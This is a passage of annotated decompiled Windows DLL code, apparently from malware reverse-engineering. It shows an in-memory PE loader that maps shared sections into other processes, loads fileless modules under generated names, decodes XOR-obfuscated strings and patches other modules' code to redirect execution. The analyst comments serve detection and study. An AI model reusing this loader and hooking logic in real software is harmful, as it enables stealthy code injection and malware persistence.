// 10003C4A: using guessed type int dword_10003C4A;
// 10003C4E: using guessed type int dword_10003C4E;
// 10003C52: using guessed type int dword_10003C52;
// 10003C56: using guessed type int (__stdcall *dword_10003C56)(_DWORD);
// 10003C5A: using guessed type int dword_10003C5A;
// 10003C5E: using guessed type int dword_10003C5E;
// 10003C62: using guessed type int dword_10003C62;
// 10003C66: using guessed type int (__stdcall *dword_10003C66)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 10003C6A: using guessed type int (__stdcall *dword_10003C6A)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 10003C6E: using guessed type int dword_10003C6E;
// 10003C72: using guessed type int dword_10003C72;
// 10003C76: using guessed type int dword_10003C76;
// 10003C7A: using guessed type int (__stdcall *dword_10003C7A)(_DWORD);

//----- (10002F0F) --------------------------------------------------------
// Creates one shared memory object of a2 bytes and maps it twice: into the
// current process (address returned through a4) and into the process whose
// handle is a1 (address returned through a5). The object's handle is returned
// through a3. Returns 0 on success, -5 if any of the three calls fails.
// NOTE(review): the two function pointers are resolved at run time; their
// argument shapes (access 983071 = 0xF001F, protection 64 = 0x40,
// 134217728 = 0x8000000; ten-argument mapping call) match NtCreateSection and
// NtMapViewOfSection -- TODO confirm against the decoded names.
// NOTE(review): on a mapping failure the handle stored at *a3 is not closed
// here.
signed int __cdecl sub_10002F0F(int a1, int a2, int a3, int a4, int a5)
{
  signed int result; // eax@2
  HANDLE v6; // eax@3
  int v7; // [sp+0h] [bp-10h]@1
  int v8; // [sp+4h] [bp-Ch]@3
  int v9; // [sp+8h] [bp-8h]@1
  int v10; // [sp+Ch] [bp-4h]@1

  // v9/v10 form a 64-bit size (low = a2, high = 0); v7 is the view size.
  v7 = a2;
  v9 = a2;
  v10 = 0;
  if ( dword_10003C66(a3, 983071, 0, &v9, 64, 134217728, 0) )
  {
    result = -5;
  }
  else
  {
    v6 = GetCurrentProcess();
    v8 =
dword_10003C6A(*(_DWORD *)a3, v6, a4, 0, 0, 0, &v7, 1, 0, 64);
    if ( v8 )
    {
      result = -5;
    }
    else
    {
      // Second view of the same object, this time in the process given by a1.
      v8 = dword_10003C6A(*(_DWORD *)a3, a1, a5, 0, 0, 0, &v7, 1, 0, 64);
      if ( v8 )
        result = -5;
      else
        result = 0;
    }
  }
  return result;
}
// 10003C66: using guessed type int (__stdcall *dword_10003C66)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 10003C6A: using guessed type int (__stdcall *dword_10003C6A)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

//----- (10002FBF) --------------------------------------------------------
// Appends one blob to a region that is being filled sequentially.
//   a1 - in/out write cursor (local address); advanced by a6
//   a2 - base address the region has in the other mapping
//   a3 - in/out running byte offset inside the region; advanced by a6
//   a4 - 8-byte descriptor to fill: {a2 + offset, a6}
//   a5 - source bytes, a6 - length (nothing is copied when a6 is 0)
// Returns the updated offset.
int __cdecl sub_10002FBF(void **a1, int a2, int a3, int a4, const void *a5, unsigned int a6)
{
  int result; // eax@3

  if ( a6 )
    sub_10003774(*a1, a5, a6);
  *(_DWORD *)a4 = *(_DWORD *)a3 + a2;
  *(_DWORD *)(a4 + 4) = a6;
  *a1 = (char *)*a1 + a6;
  result = a6 + *(_DWORD *)a3;
  *(_DWORD *)a3 = result;
  return result;
}

//----- (1000300D) --------------------------------------------------------
// Initialises the descriptor at a1:
//   +0   a1 XOR 0xAE1979DD (a self-referencing marker; sub_10003ACF searches
//        the stack for a dword with this property)
//   +4   0
//   +12  address of sub_10003F58
//   +16  module name (wide string)
// With a caller-supplied name (lpString2) the name must be shorter than 31
// characters, otherwise -1 is returned. With no name, one is generated from a
// format string decoded out of unk_100050E0 and a counter seeded from the tick
// count and thread id, repeating until GetModuleHandleW reports that no module
// of that name is loaded. Returns 0 on success.
signed int __cdecl sub_1000300D(int a1, LPCWSTR lpString2)
{
  DWORD v3; // esi@5
  const WCHAR v4; // [sp+8h] [bp-58h]@5
  DWORD v5; // [sp+5Ch] [bp-4h]@5

  if ( lpString2 )
  {
    if ( lstrlenW(lpString2) >= 31 )
      return -1;
    lstrcpyW((LPWSTR)(a1 + 16), lpString2);
  }
  else
  {
    v3 = GetTickCount();
    v5 = 3 * GetCurrentThreadId() + v3;
    sub_100036CB((int)&unk_100050E0, (int)&v4);
    do
      wsprintfW((LPWSTR)(a1 + 16), &v4, v5++);
    while ( GetModuleHandleW((LPCWSTR)(a1 + 16)) );
  }
  *(_DWORD *)a1 = a1 ^ 0xAE1979DD;
  *(_DWORD *)(a1 + 4) = 0;
  *(_DWORD *)(a1 + 12) = sub_10003F58;
  return 0;
}

//----- (100030C2) --------------------------------------------------------
// Stages a data block in shared memory for the process a1. The block is a
// 152-byte header followed by two blobs:
//   header +0..+127  copy of the 0x80-byte descriptor a2
//   header +128      0 (later receives a module handle)
//   header +132      {address, size} of blob a6/a7
//   header +140      {address, size} of blob a3/a4 (the PE image)
//   header +148      a5
// The address of the block in the target mapping is returned through a8.
// Returns 0 on success or the error from sub_10002F0F.
int __cdecl sub_100030C2(int a1, const void *a2, const void *a3, unsigned int a4, int a5, const void *a6, unsigned int a7, int a8)
{
  int result; // eax@2
  int v9; // [sp+4h] [bp-28h]@1
  int v10; // [sp+8h] [bp-24h]@3
  int v11; // [sp+Ch] [bp-20h]@6
  int v12; // [sp+10h] [bp-1Ch]@1
  int v13; // [sp+14h] [bp-18h]@1
  int v14; // [sp+18h] [bp-14h]@3
  unsigned int v15; // [sp+1Ch] [bp-10h]@1
  int v16; // [sp+20h]
[bp-Ch]@1
  int v17; // [sp+24h] [bp-8h]@3
  int v18; // [sp+28h] [bp-4h]@1

  v13 = 0;
  v16 = 0;
  v12 = 0;
  // Total size: both blobs plus the 152-byte header.
  v15 = a4 + a7 + 152;
  // v9 = shared object handle, v13 = local view, v16 = view in process a1.
  v18 = sub_10002F0F(a1, a4 + a7 + 152, (int)&v9, (int)&v13, (int)&v16);
  if ( v18 )
  {
    result = v18;
  }
  else
  {
    v17 = v13;
    v13 += 152;
    v12 = 152;
    sub_10002FBF((void **)&v13, v16, (int)&v12, v17 + 132, a6, a7);
    v10 = v13;
    sub_10002FBF((void **)&v13, v16, (int)&v12, v17 + 140, a3, a4);
    v14 = v10;
    // In the staged copy of the image only: if it is at least 0x1000 bytes, has
    // an 'MZ' header (23117) and its header offset fits, a dword at offset 204
    // from the PE signature is changed from 72 to 64.
    // NOTE(review): in a PE32 header offset 204 is the Size field of data
    // directory entry 10 (load configuration) -- TODO confirm intent.
    if ( a4 >= 0x1000 )
    {
      if ( *(_WORD *)v14 == 23117 )
      {
        if ( *(_DWORD *)(v14 + 60) + 248 < a4 )
        {
          v11 = *(_DWORD *)(v14 + 60) + v10;
          if ( *(_DWORD *)(v11 + 204) == 72 )
            *(_DWORD *)(v11 + 204) = 64;
        }
      }
    }
    sub_10003774((void *)v17, a2, 0x80u);
    *(_DWORD *)(v17 + 148) = a5;
    *(_DWORD *)(v17 + 128) = 0;
    *(_DWORD *)a8 = v16;
    // Presumably unmaps the local view and closes the shared object handle;
    // both pointers are resolved at run time -- TODO confirm.
    dword_10003C56(v17);
    dword_10003C7A(v9);
    result = 0;
  }
  return result;
}
// 10003C56: invalid function type has been ignored
// 10003C7A: invalid function type has been ignored
// 10003C56: using guessed type int (__stdcall *dword_10003C56)(_DWORD);
// 10003C7A: using guessed type int (__stdcall *dword_10003C7A)(_DWORD);

//----- (1000320E) --------------------------------------------------------
// Loads the staged PE image in the current process.
//   a1 - header of the relocated helper-code block (built by sub_1000335E)
//   a2 - staged data block (built by sub_100030C2)
//   a3 - 0x80-byte descriptor from sub_1000300D
// Steps: copy the descriptor to the stack and re-stamp its self-referencing
// marker; build an image mapping from the staged PE (sub_100041EB); make sure
// the helper code is installed (sub_1000414D); call table slot +36 with the
// module name held in the descriptor and store the result at a2+128.
// Returns 0 on success, -4 if sub_1000414D fails, -9 if the slot +36 call
// returns 0, or the error from sub_100041EB.
// v7 is the address of the copy of the dword_10003C3A pointer table inside the
// relocated block whose base is *(a1+8).
// NOTE(review): slot +36 is called with a module name and returns a handle, so
// it is presumably a LoadLibrary-type API -- TODO confirm.
// Analyst note: the result is a module loaded from memory under a name that
// has no matching file on disk.
signed int __cdecl sub_1000320E(int a1, int a2, const void *a3)
{
  signed int result; // eax@2
  int v4; // [sp+0h] [bp-90h]@5
  int v5; // [sp+4h] [bp-8Ch]@7
  signed int v6; // [sp+8h] [bp-88h]@1
  int v7; // [sp+Ch] [bp-84h]@1
  unsigned int v8; // [sp+10h] [bp-80h]@1
  int v9; // [sp+14h] [bp-7Ch]@1
  int v10; // [sp+18h] [bp-78h]@7
  char v11; // [sp+20h] [bp-70h]@5

  sub_10003774(&v8, a3, 0x80u);
  v8 = (unsigned int)&v8 ^ 0xAE1979DD;
  v9 = 0;
  v7 = (char *)&dword_10003C3A + *(_DWORD *)(a1 + 8) - byte_100037D9;
  v6 = sub_100041EB(
         (char *)&dword_10003C3A + *(_DWORD *)(a1 + 8) - byte_100037D9,
         (int)&v8,
         *(const void **)(a2 + 140),
         *(_DWORD *)(a2 + 144));
  if ( v6 )
  {
    result = v6;
  }
  else
  {
    if ( sub_1000414D(a1, v7) )
    {
      result = -4;
    }
    else
    {
      v4 = (*(int (__stdcall **)(char *))(v7 + 36))(&v11);
      if ( v4 )
      {
        *(_DWORD *)(a2 + 128) = v4;
        v5 = v10;
        if ( v10 )
        {
          v10 = 0;
          (*(void
(__stdcall **)(int))(v7 + 64))(v5);
        }
        result = 0;
      }
      else
      {
        result = -9;
      }
    }
  }
  return result;
}
// 10003C3A: using guessed type int dword_10003C3A;

//----- (10003327) --------------------------------------------------------
// Byte length of the code range that starts at sub_10003C84 and ends at
// sub_100042CC.
unsigned int __cdecl sub_10003327()
{
  return (char *)sub_100042CC - (char *)(void (__cdecl *)())sub_10003C84;
}

//----- (10003336) --------------------------------------------------------
// Start address of that code range (sub_10003C84).
signed int (__cdecl *__cdecl sub_10003336())(int)
{
  return sub_10003C84;
}

//----- (10003340) --------------------------------------------------------
// Offset of sub_10003E22 from the start of the range.
unsigned int __cdecl sub_10003340()
{
  return (char *)sub_10003E22 - (char *)(int (__stdcall *)(int))sub_10003C84;
}

//----- (1000334F) --------------------------------------------------------
// Offset of sub_10003F58 from the start of the range.
unsigned int __cdecl sub_1000334F()
{
  return (char *)sub_10003F58 - (char *)(signed int (__stdcall *)(int))sub_10003C84;
}

//----- (1000335E) --------------------------------------------------------
// Copies three ranges of this module's own code and data into shared memory
// mapped into process a1, behind a 36-byte header:
//   header +8  {address, size} of byte_100037D9 .. RtlUnwind
//   header +24 {address, size} of dword_100037B0 .. byte_100037D9
//   header +16 {address, size} of sub_10003C84 .. sub_100042CC
//   header +0  relocated address of sub_10003E22
//   header +4  relocated address of sub_10003F58
//   header +32 a2
// It also rewrites the pointer at off_100037D2 inside the copied data so that
// it refers to the relocated copy of byte_100038A7. The relocated address of
// sub_10003C84 is returned through a3 and the block address in the target
// mapping through a4. Returns 0 on success or the error from sub_10002F0F.
// Analyst note: the relocated code lives in a shared, executable mapping that
// is not backed by any image file.
int __cdecl sub_1000335E(int a1, int a2, int a3, int a4)
{
  int result; // eax@2
  unsigned int v5; // ST14_4@3
  signed int (__cdecl *v6)(int); // eax@3
  int v7; // [sp+8h] [bp-28h]@1
  int v8; // [sp+Ch] [bp-24h]@3
  unsigned int v9; // [sp+10h] [bp-20h]@3
  int v10; // [sp+14h] [bp-1Ch]@1
  int v11; // [sp+18h] [bp-18h]@1
  unsigned int v12; // [sp+1Ch] [bp-14h]@1
  int v13; // [sp+20h] [bp-10h]@1
  int v14; // [sp+24h] [bp-Ch]@3
  unsigned int v15; // [sp+28h] [bp-8h]@1
  int v16; // [sp+2Ch] [bp-4h]@1

  v11 = 0;
  v13 = 0;
  v15 = sub_10003327();
  // Total = code range + both data ranges + 36-byte header.
  v12 = v15
      + (char *)RtlUnwind
      - (char *)(int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD))byte_100037D9
      + byte_100037D9
      - (char *)dword_100037B0
      + 36;
  v10 = 0;
  v16 = sub_10002F0F(
          a1,
          v15
        + (char *)RtlUnwind
        - (char *)(int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD))byte_100037D9
        + byte_100037D9
        - (char *)dword_100037B0
        + 36,
          (int)&v7,
          (int)&v11,
          (int)&v13);
  if ( v16 )
  {
    result = v16;
  }
  else
  {
    v14 = v11;
    v11 += 36;
    v10 = 36;
    sub_10002FBF(
      (void **)&v11,
      v13,
      (int)&v10,
      v14 + 8,
      byte_100037D9,
      (char *)RtlUnwind
- (char *)(int (__stdcall *)(_DWORD, _DWORD, _DWORD, _DWORD))byte_100037D9);
    // v8 = offset of the second copied range inside the block.
    v8 = v10;
    sub_10002FBF((void **)&v11, v13, (int)&v10, v14 + 24, dword_100037B0, byte_100037D9 - (char *)dword_100037B0);
    v5 = v15;
    v6 = sub_10003336();
    sub_10002FBF((void **)&v11, v13, (int)&v10, v14 + 16, v6, v5);
    // Fix up the copied pointer off_100037D2 so it refers to the relocated
    // copy of byte_100038A7.
    v9 = (char *)&off_100037D2 - (char *)dword_100037B0 + v8 + v14;
    *(_DWORD *)((char *)&off_100037D2 - (char *)dword_100037B0 + v8 + v14) = *(_DWORD *)(v14 + 8)
                                                                           + &byte_100038A7
                                                                           - byte_100037D9;
    *(_DWORD *)v14 = *(_DWORD *)(v14 + 16) + sub_10003340();
    *(_DWORD *)(v14 + 4) = *(_DWORD *)(v14 + 16) + sub_1000334F();
    *(_DWORD *)(v14 + 32) = a2;
    *(_DWORD *)a3 = *(_DWORD *)(v14 + 16);
    *(_DWORD *)a4 = v13;
    // Presumably unmaps the local view and closes the shared object handle;
    // both pointers are resolved at run time -- TODO confirm.
    dword_10003C56(v14);
    dword_10003C7A(v7);
    result = 0;
  }
  return result;
}
// 100037B0: using guessed type int dword_100037B0[8];
// 100037D2: using guessed type char *off_100037D2;
// 100038A7: using guessed type char byte_100038A7;
// 10003C56: using guessed type int (__stdcall *dword_10003C56)(_DWORD);
// 10003C7A: using guessed type int (__stdcall *dword_10003C7A)(_DWORD);
// 10003C7E: using guessed type int __stdcall RtlUnwind(_DWORD, _DWORD, _DWORD, _DWORD);

//----- (100034D2) --------------------------------------------------------
// Entry point of the in-memory loader: loads the PE image a2 (a3 bytes) into
// the current process under the module name lpString2 (a generated name when
// lpString2 is NULL) and returns the value stored at offset +128 of the staged
// block through a4.
// Sequence:
//   1. sub_1000300D  - build the 0x80-byte descriptor (name, marker).
//   2. First call only (dword_10006010 non-zero): sub_10002DD4 resolves the
//      API pointer table; failure returns -12.
//   3. sub_100030C2  - stage descriptor + image in shared memory.
//   4. First call only: sub_1000335E copies the helper code/data block, then
//      dword_10006010 is cleared.
//   5. sub_1000320E  - perform the load.
// Returns 0 on success or the first error code encountered.
// NOTE(review): dword_10006010 / dword_10006028 / dword_1000602C are plain
// globals with no locking in this function; callers visible in this listing
// hold a mutex around it on one path only.
int __cdecl sub_100034D2(LPCWSTR lpString2, const void *a2, unsigned int a3, int a4)
{
  int result; // eax@1
  int v5; // eax@6
  int v6; // ST14_4@9
  int v7; // eax@9
  DWORD v8; // [sp-4h] [bp-88h]@1
  int v9; // [sp+0h] [bp-84h]@6
  int v10; // [sp+0h] [bp-84h]@9
  signed int v11; // [sp+0h] [bp-84h]@12
  int v12; // [sp+4h] [bp-80h]@1

  result = sub_1000300D((int)&v12, lpString2);
  if ( !result )
  {
    if ( dword_10006010 && !sub_10002DD4(v8) )
      return -12;
    v5 = (int)GetCurrentProcess();
    v9 = sub_100030C2(v5, &v12, a2, a3, -1, 0, 0, (int)&dword_1000602C);
    if ( v9 )
      return v9;
    if ( dword_10006010 )
    {
      v6 = dword_1000602C;
      v7 = (int)GetCurrentProcess();
      v10 = sub_1000335E(v7, v6, (int)&unk_10006030, (int)&dword_10006028);
      if ( v10 )
        return v10;
      dword_10006010 = 0;
    }
    v11 =
sub_1000320E(dword_10006028, dword_1000602C, &v12);
    // On success hand back the value the load stored at offset +128.
    if ( !v11 )
      *(_DWORD *)a4 = *(_DWORD *)(dword_1000602C + 128);
    // Releases the staged block through a run-time-resolved pointer
    // (presumably an unmap call -- TODO confirm).
    dword_10003C56(dword_1000602C);
    result = v11;
  }
  return result;
}
// 10003C56: using guessed type int (__stdcall *dword_10003C56)(_DWORD);
// 10006010: using guessed type int dword_10006010;
// 10006028: using guessed type int dword_10006028;

//----- (100035ED) --------------------------------------------------------
// Reads the whole file lpFileName into a VirtualAlloc'd buffer.
//   hObject - despite the name, used as an out-pointer that receives the
//             buffer address (set to 0 on failure)
//   a3      - out-pointer that receives the file size
// Files whose size needs more than 32 bits (FileSizeHigh != 0) are rejected.
// Returns 1 when the full file was read, 0 otherwise. The file handle is
// always closed once it was opened.
// NOTE(review): when ReadFile fails or is short, the buffer pointer is cleared
// without a VirtualFree, so the allocation is leaked.
int __cdecl sub_100035ED(LPCWSTR lpFileName, HANDLE hObject, int a3)
{
  HANDLE v3; // eax@1
  HANDLE v4; // edi@1
  int result; // eax@2
  DWORD v6; // ebx@3
  void *v7; // eax@5
  DWORD NumberOfBytesRead; // [sp+8h] [bp-Ch]@6
  int v9; // [sp+Ch] [bp-8h]@1
  DWORD FileSizeHigh; // [sp+10h] [bp-4h]@1
  void *v11; // [sp+20h] [bp+Ch]@1

  v4 = hObject;
  *(_DWORD *)a3 = 0;
  FileSizeHigh = 0;
  v9 = 0;
  *(_DWORD *)hObject = 0;
  // 0x80000000 = GENERIC_READ, share 1 = FILE_SHARE_READ, 3 = OPEN_EXISTING
  v3 = CreateFileW(lpFileName, 0x80000000u, 1u, 0, 3u, 0, 0);
  v11 = v3;
  if ( v3 == (HANDLE)-1 )
  {
    result = 0;
  }
  else
  {
    v6 = GetFileSize(v3, &FileSizeHigh);
    if ( v6 != -1 )
    {
      if ( !FileSizeHigh )
      {
        *(_DWORD *)a3 = v6;
        // 0x3000 = MEM_COMMIT | MEM_RESERVE, 4 = PAGE_READWRITE
        v7 = VirtualAlloc(0, v6, 0x3000u, 4u);
        *(_DWORD *)v4 = v7;
        if ( v7 )
        {
          if ( ReadFile(v11, v7, v6, &NumberOfBytesRead, 0) && NumberOfBytesRead == v6 )
            v9 = 1;
          else
            *(_DWORD *)v4 = 0;
        }
      }
    }
    CloseHandle(v11);
    result = v9;
  }
  return result;
}

//----- (1000368F) --------------------------------------------------------
// Releases a VirtualAlloc'd buffer (0x8000 = MEM_RELEASE) when lpAddress is
// non-NULL. The return value is undefined for a NULL argument.
BOOL __cdecl sub_1000368F(LPVOID lpAddress)
{
  BOOL result; // eax@2

  if ( lpAddress )
    result = VirtualFree(lpAddress, 0, 0x8000u);
  return result;
}

//----- (100036A8) --------------------------------------------------------
// Decodes an obfuscated narrow string. The source a1 is read one byte every
// two bytes; each byte is XORed with 0x12 and written to consecutive bytes at
// a2. A source byte equal to 0x12 (18) decodes to the terminating NUL and ends
// the loop. A NULL source yields an empty string.
// NOTE(review): there is no length limit; the destination must be large
// enough for the encoded string.
int __cdecl sub_100036A8(int a1, int a2)
{
  int result; // eax@1
  int i; // ecx@3
  char v4; // zf@5

  result = a1;
  if ( a1 )
  {
    for ( i = a2; ; ++i )
    {
      v4 = *(_BYTE *)result == 18;
      *(_BYTE *)i = *(_BYTE *)result ^ 0x12;
      if ( v4 )
        break;
      result += 2;
    }
  }
  else
  {
    result = a2;
    *(_BYTE *)a2 = 0;
  }
  return result;
}

//----- (100036CB) --------------------------------------------------------
// Decodes an obfuscated wide string: every 16-bit word of a1 is XORed with
// 0xAE12 and stored at a2; the word 0xAE12 itself decodes to the terminator.
__int16 __cdecl
sub_100036CB(int a1, int a2)
{
  // Wide-string decoder: XORs each 16-bit word of a1 with 0xAE12 into a2 and
  // stops after the word that equals 0xAE12 (-20974 as a signed 16-bit value),
  // which decodes to 0. A NULL source yields an empty string.
  // Analyst note: XORing the unk_1000xxxx blobs with this key recovers the
  // module and format strings statically.
  // NOTE(review): there is no length limit on the copy.
  int v2; // ecx@1
  __int16 result; // ax@2
  int v4; // edx@3
  char v5; // zf@3
  char v6; // zf@4

  v2 = a1;
  if ( a1 )
  {
    result = *(_WORD *)a1 ^ 0xAE12;
    v5 = *(_WORD *)a1 == -20974;
    v4 = a2;
    *(_WORD *)a2 = result;
    if ( !v5 )
    {
      do
      {
        v2 += 2;
        v4 += 2;
        result = *(_WORD *)v2 ^ 0xAE12;
        v6 = *(_WORD *)v2 == -20974;
        *(_WORD *)v4 = result;
      }
      while ( !v6 );
    }
  }
  else
  {
    result = 0;
    *(_WORD *)a2 = 0;
  }
  return result;
}

//----- (10003708) --------------------------------------------------------
// Returns the handle of the already-loaded module whose encoded name is stored
// at unk_10005344.
HMODULE __cdecl sub_10003708()
{
  const WCHAR ModuleName; // [sp+0h] [bp-C8h]@1

  sub_100036CB((int)&unk_10005344, (int)&ModuleName);
  return GetModuleHandleW(&ModuleName);
}

//----- (10003733) --------------------------------------------------------
// Resolves an API address from two encoded strings: a1 is the encoded wide
// module name, a2 the encoded procedure name. Both are decoded onto the stack
// and passed to GetModuleHandleW / GetProcAddress.
// NOTE(review): the module handle is not checked for NULL before use.
FARPROC __cdecl sub_10003733(int a1, int a2)
{
  HMODULE v3; // eax@1
  const WCHAR ModuleName; // [sp+0h] [bp-12Ch]@1
  const CHAR ProcName; // [sp+C8h] [bp-64h]@1

  sub_100036CB(a1, (int)&ModuleName);
  sub_100036A8(a2, (int)&ProcName);
  v3 = GetModuleHandleW(&ModuleName);
  return GetProcAddress(v3, &ProcName);
}

//----- (10003774) --------------------------------------------------------
// Plain memcpy wrapper.
void __cdecl sub_10003774(void *a1, const void *a2, unsigned int a3)
{
  memcpy(a1, a2, a3);
}

//----- (10003788) --------------------------------------------------------
// Resolves the encoded procedure name a1 in the module named by unk_10005328.
FARPROC __cdecl sub_10003788(int a1)
{
  return sub_10003733((int)&unk_10005328, a1);
}

//----- (10003799) --------------------------------------------------------
// Resolves the encoded procedure name a1 in the module named by unk_10005344.
FARPROC __cdecl sub_10003799(int a1)
{
  return sub_10003733((int)&unk_10005344, a1);
}

//----- (100037D6) --------------------------------------------------------
#error "FFFFFFFF: positive sp value has been found (funcsize=0)"

//----- (10003898) --------------------------------------------------------
#error "FFFFFFFF: positive sp value has been found (funcsize=0)"

//----- (10003ACF) --------------------------------------------------------
// Scans the stack upwards for a dword that equals its own address XORed with
// 0xAE1979DD. The scan is bounded by v8 + v7, two fields of a 28-byte block
// that the call through table slot +12 fills in.
// NOTE(review): the decompiler lost the register that holds the table base
// (v3 is never assigned) and the result of the scan; a 28-byte query filled
// from an address is consistent with VirtualQuery and
// MEMORY_BASIC_INFORMATION -- TODO confirm.
void __fastcall sub_10003ACF(int a1, int a2)
{
  unsigned int v2; // esi@1
  int v3; //
edx@1
  int v4; // eax@3
  int *v5; // [sp+4h] [bp-38h]@1
  signed int v6; // [sp+8h] [bp-34h]@1
  int v7; // [sp+Ch] [bp-30h]@1
  int v8; // [sp+18h] [bp-24h]@2
  int v9; // [sp+28h] [bp-14h]@1
  int v10; // [sp+2Ch] [bp-10h]@1
  char v11; // [sp+30h] [bp-Ch]@1

  v10 = a1;
  v9 = a2;
  v6 = 28;
  v5 = &v7;
  sub_10003B11();
  (*(void (__stdcall **)(int **, int *, signed int))(v3 + 12))(&v5, v5, v6);
  // Walk upwards from the top local until the self-referencing marker is found
  // or the bound v8 + v7 is reached.
  v2 = (unsigned int)&v11;
  do
  {
    if ( v2 >= v8 + v7 )
      break;
    v4 = *(_DWORD *)v2;
    v2 += 4;
  }
  while ( (v4 ^ 0xAE1979DD) + 4 != v2 );
}

//----- (10003B11) --------------------------------------------------------
// Empty in the decompiled output. Callers read a register (shown as an
// unassigned variable) right after calling it, so the original presumably
// returns a base address through that register -- TODO confirm in disassembly.
void __cdecl sub_10003B11()
{
  ;
}

//----- (10003B64) --------------------------------------------------------
// Resolves a function address through table slot +20, makes its first 24 bytes
// writable through slot +16 (protection value 128 = 0x80), and then compares
// the leading bytes with several fixed byte patterns. When a pattern matches,
// a few bytes are rewritten in place so that the function transfers control to
// an address supplied by the caller. Returns a1 unchanged.
// Analyst note: this is in-memory patching of another module's code; it is
// detectable by comparing the loaded module's code bytes with the file on
// disk.
// NOTE(review): v5, v10, v11 and v12 are never assigned in the decompiled
// output (values left in registers by sub_10003B11), so the exact table and
// targets cannot be read from this listing alone.
int __usercall sub_10003B64(int a1, int a2, int a3)
{
  int v3; // eax@1
  int v4; // ecx@1
  int v5; // edx@1
  int v6; // eax@2
  int v7; // edx@2
  int v8; // ecx@2
  int v9; // ST00_4@2
  int v10; // edx@2
  int v11; // edx@11
  int v12; // eax@11
  int v15; // [sp-10h] [bp-10h]@2
  int v16; // [sp-Ch] [bp-Ch]@1
  int v17; // [sp-8h] [bp-8h]@1
  int v18; // [sp-4h] [bp-4h]@1

  v18 = a1;
  v17 = a3;
  v16 = a2;
  sub_10003B11();
  *(_DWORD *)(v5 + 4) = 0;
  v3 = (*(int (__stdcall **)(_DWORD, int))(v5 + 20))(*(_DWORD *)v5, v16);
  v4 = v17;
  if ( v3 )
  {
    v17 = v3;
    v16 = v4;
    v15 = v3;
    v9 = v3;
    sub_10003B11();
    v7 = (*(int (__stdcall **)(int, signed int, signed int, int *))(v10 + 16))(v9, 24, 128, &v15);
    v8 = v16;
    v6 = v17;
    if ( v7 )
    {
      // Each branch below matches one known layout of the target's first bytes.
      if ( *(_BYTE *)v17 == -72 )
      {
        if ( *(_BYTE *)(v17 + 5) == -70 )
        {
          if ( *(_WORD *)(v17 + 10) != -11521 )
          {
            if ( *(_WORD *)(v17 + 10) != 4863 )
              return v18;
            *(_BYTE *)(v17 + 11) = -46;
          }
          *(_DWORD *)(v6 + 6) = v8;
          return v18;
        }
        if ( *(_DWORD *)(v17 + 5) == 69489805 )
        {
          if ( *(_DWORD *)(v17 + 8) == -1037120252 )
          {
            *(_DWORD *)(v17 + 6) = v16 - v17 - 10;
            *(_BYTE *)(v6 + 5) = -24;
            *(_BYTE *)(v6 + 10) = -112;
          }
        }
        else
        {
          if ( *(_DWORD *)(v17 + 7) == 69489805 )
          {
            if ( *(_DWORD *)(v17 + 11) == -1072300188 )
            {
              if ( *(_DWORD *)(v17 + 15) == -1040187392 )
              {
                v17 = v7;
                sub_10003B11();
                *(_DWORD *)(v11 + 4) = 1;
                v16 =
v12;
                _ESI = v12;
                // Atomic 8-byte write at offset 0x0A of the target, so the
                // change is applied in one step.
                __asm { lock cmpxchg8b qword ptr [esi+0Ah] }
              }
            }
          }
        }
      }
    }
  }
  return v18;
}

//----- (10003C84) --------------------------------------------------------
// First routine of the code range that sub_1000335E copies into shared
// memory; it runs from that relocated copy. a1 is the 36-byte block header,
// *(a1+32) the staged data block (v7), and v8 the relocated copy of the API
// pointer table.
// Steps:
//   1. Copy the 0x80-byte descriptor to the stack and re-stamp its
//      self-referencing marker.
//   2. sub_100041EB builds an image mapping from the staged PE.
//   3. sub_1000414D makes sure the helper code is installed (-4 on failure).
//   4. Table slot +36 is called with the module name; 0 gives -9. The result
//      is stored at block offset +128.
//   5. Unless block offset +148 is -1: slot +52 starts something with the
//      routine at *a1 and argument a1 (0 gives -13), slot +56 is called with
//      (handle, -1) and slot +60 fetches a result into v6.
//   6. The stored handle v11 is released through slot +64 and the staged block
//      through slot +28.
// NOTE(review): slots +52/+56/+60 have the argument shapes of CreateThread
// (stack size 524288 = 0x80000), WaitForSingleObject(INFINITE) and
// GetExitCodeThread; slot +36 that of a LoadLibrary-type call -- TODO confirm
// against the decoded names. v2 is an untracked register value.
signed int __cdecl sub_10003C84(int a1)
{
  int v2; // [sp-4h] [bp-9Ch]@3
  int v3; // [sp+0h] [bp-98h]@8
  int v4; // [sp+4h] [bp-94h]@5
  int v5; // [sp+8h] [bp-90h]@11
  int v6; // [sp+Ch] [bp-8Ch]@1
  int v7; // [sp+10h] [bp-88h]@1
  int v8; // [sp+14h] [bp-84h]@1
  unsigned int v9; // [sp+18h] [bp-80h]@1
  int v10; // [sp+1Ch] [bp-7Ch]@1
  int v11; // [sp+20h] [bp-78h]@11
  int v12; // [sp+24h] [bp-74h]@1
  char v13; // [sp+28h] [bp-70h]@5

  v7 = *(_DWORD *)(a1 + 32);
  v8 = (char *)&dword_10003C3A + *(_DWORD *)(a1 + 8) - byte_100037D9;
  sub_100040B7(&v9, (const void *)v7, 0x80u);
  v9 = (unsigned int)&v9 ^ 0xAE1979DD;
  v10 = 0;
  v12 = *(_DWORD *)(a1 + 4);
  v6 = sub_100041EB(v8, (int)&v9, *(const void **)(v7 + 140), *(_DWORD *)(v7 + 144));
  if ( v6 )
    return v6;
  v6 = sub_1000414D(a1, v8);
  if ( v6 )
    return -4;
  v4 = (*(int (__thiscall **)(int, char *))(v8 + 36))(v2, &v13);
  if ( !v4 )
    return -9;
  *(_DWORD *)(v7 + 128) = v4;
  if ( *(_DWORD *)(v7 + 148) != -1 )
  {
    v3 = (*(int (__thiscall **)(int, _DWORD, signed int, _DWORD, int, _DWORD, _DWORD))(v8 + 52))(
           v4,
           0,
           524288,
           *(_DWORD *)a1,
           a1,
           0,
           0);
    if ( !v3 )
      return -13;
    (*(void (__stdcall **)(int, signed int))(v8 + 56))(v3, -1);
    (*(void (__stdcall **)(int, int *))(v8 + 60))(v3, &v6);
  }
  v5 = v11;
  if ( v11 )
  {
    v11 = 0;
    (*(void (__stdcall **)(int))(v8 + 64))(v5);
  }
